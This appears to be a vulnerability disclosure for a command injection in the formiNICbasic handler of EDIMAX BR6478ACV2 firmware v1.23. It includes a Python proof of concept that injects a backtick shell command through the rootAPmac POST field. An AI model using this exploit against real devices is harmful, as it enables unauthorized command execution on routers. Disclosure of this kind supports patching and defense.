EDIMAX-BR6478ACV2-formiNICbasic

Overview

The device's official website: https://download.edimax.com/mw/cufiles/files/download/Firmware/BR6478ACV2_v1.23.zip

Affected version

BR6478ACV2_v1.23

Vulnerability details

The EDIMAX BR6478ACV2_v1.23 firmware has a command injection vulnerability in the formiNICbasic function. The v432 variables receive the rootAPmac parameters from a POST request. However, since the user can control the input of these variables, the statement system() can cause a command injection.

POC

import requests

ip = "192.168.2.1"

data = {
    "use_apmode":        "",
    "mssidSelect":       "0",
    "enableMSSID":       "",
    "wlanDisabled":      "",
    "wlan0Enable":       "1",
    "isRepeaterBasicUI": "",
    "vlanid":            "",
    "wireless_block_relay": "",
    "apMode":            "",
    "band":              "",
    "secchan":           "",
    "chan":               "",
    "hiddenSSID":        "",
    "hiddenSSID2g":      "",
    "autoMacClone":      "",
    "ssid":              "",
    "repUseCrossBand":   "",
    "force_enable2g5g_ap": "",
    "method":            "",
    "iqsetupclose":      "",
    "submit-url":        "",
    "doConnectTest":     "1",
    "rootAPmac":         "'`ps>/1.txt`'",
    "isApply":           "",
}
url = f'http://{ip}/goform/formiNICbasic'

res = requests.post(url=url, data=data, verify=False)
print(res)